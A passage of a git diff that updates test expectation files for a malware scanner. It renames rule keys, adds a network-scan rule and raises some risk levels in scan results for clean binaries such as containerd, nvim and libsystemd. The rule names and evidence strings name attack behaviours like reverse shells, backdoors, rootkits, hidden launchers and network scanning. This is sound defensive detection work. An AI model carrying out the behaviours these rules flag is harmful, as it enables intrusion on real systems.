[RemoveBrowserPluginEmbedder](https://github.com/search?q=RemoveBrowserPluginEmbedder&type=code)
[SendToPlugin](https://github.com/search?q=SendToPlugin&type=code)
[SetBrowserPluginGuest](https://github.com/search?q=SetBrowserPluginGuest&type=code)
[The plugin has not](https://github.com/search?q=The+plugin+has+not&type=code)
[Unable to create ppapi plugin process](https://github.com/search?q=Unable+to+create+ppapi+plugin+process&type=code)
[Unable to load plugin](https://github.com/search?q=Unable+to+load+plugin&type=code)
[Unable to load ppapi plugin](https://github.com/search?q=Unable+to+load+ppapi+plugin&type=code)
[allowNonEmptyNavigatorPlugins](https://github.com/search?q=allowNonEmptyNavigatorPlugins&type=code)
[as a plugin](https://github.com/search?q=as+a+plugin&type=code)
[browserplugin](https://github.com/search?q=browserplugin&type=code)
[enabledPlugin](https://github.com/search?q=enabledPlugin&type=code)
[html_plugin_element](https://github.com/search?q=html_plugin_element&type=code)
[kPluginObject](https://github.com/search?q=kPluginObject&type=code)
[loadplugin](https://github.com/search?q=loadplugin&type=code)
[of theremnants ofpluginspage](https://github.com/search?q=of+theremnants+ofpluginspage&type=code)
[page contains plugins](https://github.com/search?q=page+contains+plugins&type=code)
[pdf_internal_plugin_wrapper](https://github.com/search?q=pdf_internal_plugin_wrapper&type=code)
[pdf_view_plugin_base](https://github.com/search?q=pdf_view_plugin_base&type=code)
[pdf_view_web_plugin](https://github.com/search?q=pdf_view_web_plugin&type=code)
[pepper_hung_plugin_filter](https://github.com/search?q=pepper_hung_plugin_filter&type=code)
[pepper_webplugin_impl](https://github.com/search?q=pepper_webplugin_impl&type=code)
[plugin data](https://github.com/search?q=plugin+data&type=code)
[pluginObject](https://github.com/search?q=pluginObject&type=code)
[plugin_audio_thread](https://github.com/search?q=plugin_audio_thread&type=code)
[plugin_container_impl](https://github.com/search?q=plugin_container_impl&type=code)
[plugin_instance_impl](https://github.com/search?q=plugin_instance_impl&type=code)
[plugin_message_filter](https://github.com/search?q=plugin_message_filter&type=code)
[plugin_module](https://github.com/search?q=plugin_module&type=code)
[plugin_private_storage](https://github.com/search?q=plugin_private_storage&type=code)
[plugin_process_host](https://github.com/search?q=plugin_process_host&type=code)
[plugin_service_impl](https://github.com/search?q=plugin_service_impl&type=code)
[pluginprH](https://github.com/search?q=pluginprH&type=code)
[pluginsEnabled](https://github.com/search?q=pluginsEnabled&type=code)
[pluginspace](https://github.com/search?q=pluginspace&type=code)
[pluginswithin](https://github.com/search?q=pluginswithin&type=code)
[pluginurl](https://github.com/search?q=pluginurl&type=code)
[ppapi_plugin_main](https://github.com/search?q=ppapi_plugin_main&type=code)
[ppapi_plugin_process](https://github.com/search?q=ppapi_plugin_process&type=code)
[r PluginH](https://github.com/search?q=r+PluginH&type=code)
[relativebringingincreasegovernorplugins](https://github.com/search?q=relativebringingincreasegovernorplugins&type=code)
[security origin than your plugin](https://github.com/search?q=security+origin+than+your+plugin&type=code)
[strictMixedContentCheckingForPlugin](https://github.com/search?q=strictMixedContentCheckingForPlugin&type=code)
[suggestplugin](https://github.com/search?q=suggestplugin&type=code) | | LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | +| LOW | [exec/program/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/hidden.yara#relative_hidden_launcher) | relative hidden launcher | [./.691.9B](https://github.com/search?q=.%2F.691.9B&type=code)
[bash](https://github.com/search?q=bash&type=code)
[exec](https://github.com/search?q=exec&type=code)
[system](https://github.com/search?q=system&type=code) | | LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | | LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [CreateDirectoryAndGetEr](https://github.com/search?q=CreateDirectoryAndGetEr&type=code)
[CreateDirectoryResult](https://github.com/search?q=CreateDirectoryResult&type=code)
[createFolder](https://github.com/search?q=createFolder&type=code)
[mkdir](https://github.com/search?q=mkdir&type=code) | | LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) | @@ -171,6 +173,5 @@ | LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | | LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | | LOW | [process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | -| LOW | [process/thread_local_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/thread_local_storage.yara#tls_get_addr) | [Uses glibc thread local storage](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | | LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | diff --git a/tests/linux/clean/containerd.simple b/tests/linux/clean/containerd.simple index 6c40382aa..a3083b132 100644 --- a/tests/linux/clean/containerd.simple +++ b/tests/linux/clean/containerd.simple @@ -27,9 +27,9 @@ discover/system/cpu_info: low discover/system/hostname_get: low discover/system/platform: medium discover/user/USER: low -evasion/covert_location/dev_mqueue: medium -evasion/covert_location/dev_shm: medium -evasion/hidden_paths/var_run: medium +evasion/file/location/dev_mqueue: medium +evasion/file/location/dev_shm: medium +evasion/file/location/var_run: medium evasion/process_injection/ptrace: medium exec/plugin: low exec/program: medium @@ -73,6 +73,7 @@ fs/watch: low hw/dev/block_ice: medium hw/dev/mapper: medium impact/remote_access/heartbeat: medium +lateral/scan/tool: medium net/dns: low net/dns/reverse: medium net/dns/servers: low diff --git a/tests/linux/clean/cpack.md b/tests/linux/clean/cpack.md index f81da4983..cd340dd51 100644 --- a/tests/linux/clean/cpack.md +++ b/tests/linux/clean/cpack.md @@ -11,7 +11,7 @@ | MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code) | | MEDIUM | [discover/processes/list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/processes/list.yara#ps_exec) | ps exec | [#!](https://github.com/search?q=%23%21&type=code)
[ps ax](https://github.com/search?q=ps+ax&type=code) | | MEDIUM | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#os_release) | [operating-system identification](https://developer.apple.com/documentation/os/1524245-os_release) | [os_release](https://github.com/search?q=os_release&type=code) | -| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | +| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | | MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [N_125cmFunctionFunctionBlocker16StartCommandNameEv](https://github.com/search?q=N_125cmFunctionFunctionBlocker16StartCommandNameEv&type=code)
[StartupCommands](https://github.com/search?q=StartupCommands&type=code)
[_N_122cmBlockFunctionBlocker16StartCommandNameEv](https://github.com/search?q=_N_122cmBlockFunctionBlocker16StartCommandNameEv&type=code)
[_N_122cmMacroFunctionBlocker16StartCommandNameEv](https://github.com/search?q=_N_122cmMacroFunctionBlocker16StartCommandNameEv&type=code)
[_N_124cmForEachFunctionBlocker16StartCommandNameEv](https://github.com/search?q=_N_124cmForEachFunctionBlocker16StartCommandNameEv&type=code)
[_ZN13cmSystemTools23s_RunCommandHideConsoleE](https://github.com/search?q=_ZN13cmSystemTools23s_RunCommandHideConsoleE&type=code)
[_ZN13cmSystemTools25s_DisableRunCommandOutputE](https://github.com/search?q=_ZN13cmSystemTools25s_DisableRunCommandOutputE&type=code)
[_ZNK19cmIfFunctionBlocker16StartCommandNameEv](https://github.com/search?q=_ZNK19cmIfFunctionBlocker16StartCommandNameEv&type=code)
[_ZNK22cmWhileFunctionBlocker16StartCommandNameEv](https://github.com/search?q=_ZNK22cmWhileFunctionBlocker16StartCommandNameEv&type=code)
[_ZZN12_GLOBAL__N_117TryRunCommandImpl18DoNotRunExecutableERKNSt7_](https://github.com/search?q=_ZZN12_GLOBAL__N_117TryRunCommandImpl18DoNotRunExecutableERKNSt7_&type=code)
[cmExecuteCommand](https://github.com/search?q=cmExecuteCommand&type=code) | | MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | | MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execvp](https://github.com/search?q=execvp&type=code) | @@ -30,6 +30,7 @@ | MEDIUM | [fs/proc/meminfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/meminfo.yara#proc_meminfo_val) | get memory info | [/proc/meminfo](https://github.com/search?q=%2Fproc%2Fmeminfo&type=code) | | MEDIUM | [fs/proc/self_exe](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe) | gets executable associated to this process | [/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code) | | MEDIUM | [impact/remote_access/crypto_listen_socks](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/crypto_listen_socks.yara#socks_crypto_listener) | socks crypto listener | [SOCKS5](https://github.com/search?q=SOCKS5&type=code)
[crypto](https://github.com/search?q=crypto&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socks5](https://github.com/search?q=socks5&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [%d.%d.%d.%d](https://github.com/search?q=%25d.%25d.%25d.%25d&type=code)
[connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | MEDIUM | [net/dns/over_https](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-over-https.yara#doh_refs) | Supports DNS (Domain Name Service) over HTTPS | [application/dns-message](https://github.com/search?q=application%2Fdns-message&type=code) | | MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/download.yara#download) | download files | [CPACK_DOWNLOAD_ALL](https://github.com/search?q=CPACK_DOWNLOAD_ALL&type=code)
[CPACK_DOWNLOAD_SITE](https://github.com/search?q=CPACK_DOWNLOAD_SITE&type=code)
[CPACK_IFW_DOWNLOAD_ALL](https://github.com/search?q=CPACK_IFW_DOWNLOAD_ALL&type=code)
[CPACK_INNOSETUP_DOWNLOAD_COUNT_INTERNAL](https://github.com/search?q=CPACK_INNOSETUP_DOWNLOAD_COUNT_INTERNAL&type=code)
[CPACK_INNOSETUP_DOWNLOAD_HASHES_INTERNAL](https://github.com/search?q=CPACK_INNOSETUP_DOWNLOAD_HASHES_INTERNAL&type=code)
[CPACK_INNOSETUP_DOWNLOAD_URLS_INTERNAL](https://github.com/search?q=CPACK_INNOSETUP_DOWNLOAD_URLS_INTERNAL&type=code)
[CPACK_USES_DOWNLOAD](https://github.com/search?q=CPACK_USES_DOWNLOAD&type=code)
[Call DownloadFile](https://github.com/search?q=Call+DownloadFile&type=code)
[DOWNLOAD HASH mismatch](https://github.com/search?q=DOWNLOAD+HASH+mismatch&type=code)
[DOWNLOAD cannot set TLS](https://github.com/search?q=DOWNLOAD+cannot+set+TLS&type=code)
[DOWNLOAD cannot set http](https://github.com/search?q=DOWNLOAD+cannot+set+http&type=code)
[DOWNLOAD cannot set url](https://github.com/search?q=DOWNLOAD+cannot+set+url&type=code)
[DOWNLOAD cannot set user](https://github.com/search?q=DOWNLOAD+cannot+set+user&type=code)
[DOWNLOAD error](https://github.com/search?q=DOWNLOAD+error&type=code)
[DOWNLOAD missing ALGO](https://github.com/search?q=DOWNLOAD+missing+ALGO&type=code)
[DOWNLOAD missing VAR for](https://github.com/search?q=DOWNLOAD+missing+VAR+for&type=code)
[Maxdownload](https://github.com/search?q=Maxdownload&type=code)
[VERIFY_DOWNLOADS](https://github.com/search?q=VERIFY_DOWNLOADS&type=code)
[_DOWNLOADED](https://github.com/search?q=_DOWNLOADED&type=code)
[completely downloaded](https://github.com/search?q=completely+downloaded&type=code)
[compute hash on downloaded file](https://github.com/search?q=compute+hash+on+downloaded+file&type=code)
[cw_download_write](https://github.com/search?q=cw_download_write&type=code)
[download_write body](https://github.com/search?q=download_write+body&type=code)
[download_write header](https://github.com/search?q=download_write+header&type=code)
[for the URL download method](https://github.com/search?q=for+the+URL+download+method&type=code)
[hash on failed download](https://github.com/search?q=hash+on+failed+download&type=code)
[is already downloaded](https://github.com/search?q=is+already+downloaded&type=code)
[isDownloaded](https://github.com/search?q=isDownloaded&type=code)
[maxdownload](https://github.com/search?q=maxdownload&type=code)
[partial download completed](https://github.com/search?q=partial+download+completed&type=code)
[protected CPackDownloadArchives](https://github.com/search?q=protected+CPackDownloadArchives&type=code)
[protected CPackDownloadComponents](https://github.com/search?q=protected+CPackDownloadComponents&type=code)
[protected CPackDownloadCount](https://github.com/search?q=protected+CPackDownloadCount&type=code)
[protected CPackDownloadHashes](https://github.com/search?q=protected+CPackDownloadHashes&type=code)
[protected CPackDownloadUrls](https://github.com/search?q=protected+CPackDownloadUrls&type=code)
[skipping download as file already](https://github.com/search?q=skipping+download+as+file+already&type=code)
[t resume download](https://github.com/search?q=t+resume+download&type=code) | | MEDIUM | [net/download/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/fetch.yara#curl_value) | Invokes curl to download a file | [curl due to a build-time decision.](https://github.com/search?q=curl+due+to+a+build-time+decision.&type=code)
[curl function was given a bad argument](https://github.com/search?q=curl+function+was+given+a+bad+argument&type=code)
[curl is built without the HTTPS-proxy support.](https://github.com/search?q=curl+is+built+without+the+HTTPS-proxy+support.&type=code)
[curl lacks IDN support](https://github.com/search?q=curl+lacks+IDN+support&type=code)
[curl offers](https://github.com/search?q=curl+offers&type=code)
[curl understands](https://github.com/search?q=curl+understands&type=code)
[curl user interface](https://github.com/search?q=curl+user+interface&type=code) | diff --git a/tests/linux/clean/default_config.json.simple b/tests/linux/clean/default_config.json.simple index 92c43b7f1..c87b72cff 100644 --- a/tests/linux/clean/default_config.json.simple +++ b/tests/linux/clean/default_config.json.simple @@ -25,7 +25,7 @@ discover/system/platform: low discover/user/name_get: medium evasion/bypass_security/linux/iptables: medium evasion/bypass_security/linux/ufw: medium -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium evasion/logging/acct: low evasion/process_injection/readelf: medium exec/plugin: low @@ -53,6 +53,7 @@ hw/wireless: low impact/exploit: medium impact/exploit/cve: medium impact/remote_access/iptables: medium +lateral/scan/tool: medium net/dns/servers: low net/download: medium net/http/cookies: medium diff --git a/tests/linux/clean/emscripten.sh.simple b/tests/linux/clean/emscripten.sh.simple index c52f451b3..08f914c03 100644 --- a/tests/linux/clean/emscripten.sh.simple +++ b/tests/linux/clean/emscripten.sh.simple @@ -1,6 +1,6 @@ # linux/clean/emscripten.sh: medium c2/tool_transfer/shell: medium -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium fs/file/delete: medium fs/file/delete_forcibly: low fs/file/make_executable: medium diff --git a/tests/linux/clean/kibana/3728c08d-9b70-456b-b6b8-007c7d246128_5.json.simple b/tests/linux/clean/kibana/3728c08d-9b70-456b-b6b8-007c7d246128_5.json.simple index e5fa47d26..da76501a0 100644 --- a/tests/linux/clean/kibana/3728c08d-9b70-456b-b6b8-007c7d246128_5.json.simple +++ b/tests/linux/clean/kibana/3728c08d-9b70-456b-b6b8-007c7d246128_5.json.simple @@ -1,7 +1,7 @@ # linux/clean/kibana/3728c08d-9b70-456b-b6b8-007c7d246128_5.json: high -evasion/covert_location/dev_shm: medium -evasion/hidden_paths/dev_shm: low -evasion/hidden_paths/hidden: high +evasion/file/location/dev_shm: medium +evasion/file/prefix: high +evasion/file/prefix/dev: low exec/shell/command: medium fs/path/etc: low fs/path/etc_initd: medium diff --git a/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple b/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple index 7628d3546..e2a82f889 100644 --- a/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple +++ b/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple @@ -52,7 +52,8 @@ data/encoding/json_decode: low data/encoding/json_encode: low data/hash/md5: low discover/network/mac_address: medium -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium +evasion/rootkit/refs: medium exec/cmd: medium exec/plugin: low exec/shell/power: medium @@ -75,8 +76,8 @@ impact/remote_access/iptables: medium impact/remote_access/reverse_shell: high impact/remote_access/trojan: medium impact/rootkit: low -impact/rootkit/refs: medium lateral/scan/brute_force: low +lateral/scan/tool: high net/dns/txt: low net/download: medium net/http/post: medium diff --git a/tests/linux/clean/kuma-cp.simple b/tests/linux/clean/kuma-cp.simple index ce32d7bad..a06ab3b47 100644 --- a/tests/linux/clean/kuma-cp.simple +++ b/tests/linux/clean/kuma-cp.simple @@ -41,8 +41,8 @@ discover/user/USER: low discover/user/name_get: medium evasion/bypass_security/linux/iptables: medium evasion/bypass_security/linux/se: medium -evasion/hidden_paths/hidden: medium -evasion/hidden_paths/var_run: medium +evasion/file/location/var_run: medium +evasion/file/prefix: medium exec/cmd: medium exec/conditional/LANG: low exec/plugin: low @@ -81,6 +81,7 @@ fs/watch: low hw/dev/block_ice: medium impact/remote_access/heartbeat: medium impact/remote_access/iptables: medium +lateral/scan/tool: medium net/dns: low net/dns/reverse: medium net/dns/servers: low diff --git a/tests/linux/clean/ld-2.27.so.simple b/tests/linux/clean/ld-2.27.so.simple index ed8d10b80..f9e612813 100644 --- a/tests/linux/clean/ld-2.27.so.simple +++ b/tests/linux/clean/ld-2.27.so.simple @@ -12,5 +12,5 @@ fs/tempdir: low impact/exploit/GCONV_PATH: low net/url/embedded: low persist/shell/bash: medium -process/thread_local_storage: low +process/thread_local_storage: medium sus/exclamation: medium diff --git a/tests/linux/clean/libsystemd.so.0.simple b/tests/linux/clean/libsystemd.so.0.simple index 3800798c7..904a7a5e4 100644 --- a/tests/linux/clean/libsystemd.so.0.simple +++ b/tests/linux/clean/libsystemd.so.0.simple @@ -2,7 +2,7 @@ data/compression/lzma: low data/random/insecure: low discover/user/USER: low -evasion/hidden_paths/var_run: medium +evasion/file/location/var_run: medium exec/program: medium exec/shell/TERM: low fs/file/copy: medium @@ -20,6 +20,7 @@ fs/proc/self_cmdline: medium fs/proc/self_exe: medium fs/proc/self_status: medium fs/watch: low +lateral/scan/tool: medium mem/anonymous_file: medium net/ip/addr: medium net/resolve/hostport_parse: low @@ -37,5 +38,5 @@ process/multithreaded: low process/name_set: medium process/namespace_set: low process/parent_pid_get: low -process/thread_local_storage: low +process/thread_local_storage: medium process/userid_set: low diff --git a/tests/linux/clean/ls.x86_64.md b/tests/linux/clean/ls.x86_64.md index fe3d4731f..0581d57d9 100644 --- a/tests/linux/clean/ls.x86_64.md +++ b/tests/linux/clean/ls.x86_64.md @@ -2,6 +2,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|--------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | | LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#gzip) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) | | LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | diff --git a/tests/linux/clean/lslogins.md b/tests/linux/clean/lslogins.md index c668064d7..61a1256c2 100644 --- a/tests/linux/clean/lslogins.md +++ b/tests/linux/clean/lslogins.md @@ -4,7 +4,7 @@ |--------|--------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | HIGH | [evasion/logging/historical_logins](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/historical_logins.yara#login_records) | accesses historical login records | [/var/log/lastlog](https://github.com/search?q=%2Fvar%2Flog%2Flastlog&type=code) | | MEDIUM | [collect/databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite](https://github.com/search?q=sqlite&type=code) | -| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | +| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | | MEDIUM | [evasion/logging/failed_logins](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/failed_logins.yara#failed_logins) | accesses failed logins | [/var/log/btmp](https://github.com/search?q=%2Fvar%2Flog%2Fbtmp&type=code) | | MEDIUM | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.linuxbrew/Cellar/util-linux/2.40.2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Futil-linux%2F2.40.2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/util-linux/2.40.2/share/locale](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Futil-linux%2F2.40.2%2Fshare%2Flocale&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcrypt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcrypt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/ncurses/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fncurses%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/readline/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Freadline%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/sqlite/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsqlite%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/zlib/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fzlib%2Flib&type=code) | | MEDIUM | [fs/path/relative](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/relative.yara#relative_path_val) | references and possibly executes relative path | [./include](https://github.com/search?q=.%2Finclude&type=code) | diff --git a/tests/linux/clean/melange.simple b/tests/linux/clean/melange.simple index a17f603f6..e5eeedda2 100644 --- a/tests/linux/clean/melange.simple +++ b/tests/linux/clean/melange.simple @@ -44,9 +44,9 @@ discover/user/HOME: low discover/user/USER: low discover/user/name_get: medium evasion/bypass_security/linux/se: medium -evasion/hidden_paths/hidden: medium +evasion/file/location/system_directories: medium +evasion/file/prefix: medium evasion/hide_artifacts/pivot_root: medium -evasion/hide_artifacts/system_directories: medium exec/cmd: medium exec/install_additional/pip_install: medium exec/plugin: low @@ -94,6 +94,7 @@ fs/unmount: low fs/watch: low impact/remote_access/heartbeat: medium impact/remote_access/kill_rm: medium +lateral/scan/tool: medium net/dns: low net/dns/reverse: medium net/dns/servers: low diff --git a/tests/linux/clean/misp_sample.ndjson.log.simple b/tests/linux/clean/misp_sample.ndjson.log.simple index eedc03a76..e318a6866 100644 --- a/tests/linux/clean/misp_sample.ndjson.log.simple +++ b/tests/linux/clean/misp_sample.ndjson.log.simple @@ -3,10 +3,10 @@ c2/addr/ip: medium c2/tool_transfer/download: high crypto/aes: low +evasion/rootkit/refs: high exec/shell/command: medium false-positives/filebeat: low impact/ransom/decryptor: medium impact/remote_access/backdoor: high -impact/rootkit/refs: high net/url/embedded: medium os/fd/multiplex: low diff --git a/tests/linux/clean/mongosh.simple b/tests/linux/clean/mongosh.simple index 0bf8f2dd6..a2b7f4434 100644 --- a/tests/linux/clean/mongosh.simple +++ b/tests/linux/clean/mongosh.simple @@ -48,7 +48,7 @@ discover/user/HOME: low discover/user/USER: low discover/user/info: medium discover/user/name_get: low -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium evasion/logging/acct: low exec/cmd: medium exec/conditional/LANG: low diff --git a/tests/linux/clean/nvim.simple b/tests/linux/clean/nvim.simple index 3f1bafa25..cdba2a285 100644 --- a/tests/linux/clean/nvim.simple +++ b/tests/linux/clean/nvim.simple @@ -16,8 +16,8 @@ discover/processes/pgrep: medium discover/system/platform: low discover/user/HOME: low discover/user/USER: low -evasion/hidden_paths/hidden: medium -evasion/hidden_paths/x11: low +evasion/file/location/tmp_x11_unix: low +evasion/file/prefix: medium exec/conditional/LANG: low exec/dylib/symbol_address: medium exec/plugin: low @@ -54,6 +54,7 @@ fs/tempdir/TEMP: low fs/tempdir/TMPDIR: low fs/tempdir/create: low fs/tempdir/tempfile_create: low +lateral/scan/tool: medium net/dns/servers: low net/download/fetch: medium net/http/post: medium diff --git a/tests/linux/clean/opa.simple b/tests/linux/clean/opa.simple index 360cb7418..25d47620c 100644 --- a/tests/linux/clean/opa.simple +++ b/tests/linux/clean/opa.simple @@ -53,6 +53,7 @@ fs/proc/self_cgroup: medium fs/proc/self_mountinfo: medium fs/tempdir/tempfile_create: low fs/watch: low +lateral/scan/tool: medium net/dns: low net/dns/reverse: medium net/dns/servers: low diff --git a/tests/linux/clean/pandoc.md b/tests/linux/clean/pandoc.md index fd1071a42..cb282ccb5 100644 --- a/tests/linux/clean/pandoc.md +++ b/tests/linux/clean/pandoc.md @@ -21,7 +21,7 @@ | MEDIUM | [discover/group/lookup](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/group/lookup.yara#getgrent) | get entry from group database | [endgrent](https://github.com/search?q=endgrent&type=code)
[getgrent](https://github.com/search?q=getgrent&type=code)
